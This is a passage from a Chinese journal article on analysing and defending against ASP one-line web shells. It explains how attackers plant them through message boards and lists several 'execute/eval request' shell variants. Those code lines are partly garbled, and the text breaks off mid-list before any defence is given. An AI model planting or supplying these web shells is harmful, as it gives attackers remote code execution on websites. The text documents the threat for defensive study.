常见ASP一句话木马分析及防御
作者:罗婷 罗芳
来源:《电子技术与软件工程》2013年第22
        什么是一句话木马?一句话木马本身并不是任何黑客程序,只是在很多网站上都会使用到的普通代码。一句话木马只是网络攻击当中的一个小块,但通过对其防御可以大大减少相关的攻击。
        【关键词】木马分析 木马防御
        很多制作网站的朋友经常会听到一句话:我的网站又被一句话木马入侵了。但什么是一句话木马?一句话木马本身并不是任何黑客程序,只是在很多网站上都会使用到的普通代码。但这个代码会给网站打开一个缺口,通过这个缺口黑客可以将真正的木马,也就是通常所说的大马注入到网站服务器当中。
        “大马asp资讯网站源码注入到网站服务器后,可通过控制整个网站的所有的源代码,其中程序修改或删除网站的其它内容。如果一不小心注入的是网站服务器,那么影响的就不是一个网站,而是整个网站服务器上的所有网站。
        黑客通常通过google网站查到全部ASP类型的网站。然后,在留言板或文章发表区域等可以将内容上传到服务器上的地方输入一句话木马。也就是想办法将一句话木马程序代码添加到网站的后台数据库。
        目前在当下黑客经常使用的ASP一句话木马主要有下面几种:
        1<% executerequest"value")) %>
        2<% execute request"value" %>
        3<% eval request"value " %>
        4<% eval requestvalue %>
        通过语法变形后还有下列几种:
        1<% If Request"value"<>"" Then ExecuteRequest"value"))%>
        2

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。